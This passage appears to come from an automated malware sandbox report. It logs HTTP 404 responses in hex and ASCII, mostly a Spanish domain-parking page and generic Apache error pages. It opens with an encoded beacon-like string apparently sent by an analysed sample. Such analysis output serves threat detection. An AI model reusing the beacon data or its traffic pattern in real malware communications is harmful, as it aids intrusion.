67 3d 3d Data Ascii: MzYDklf=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CYpdCdtH2UAjAxnDlH+aBaqu/yo0guSY4YWg9IAKF2fTxbC8u1g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:42:17 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:42:19 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:42:22 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:42:25 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:42:46 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:42:49 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:42:52 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:42:55 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:43:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:43:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:43:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 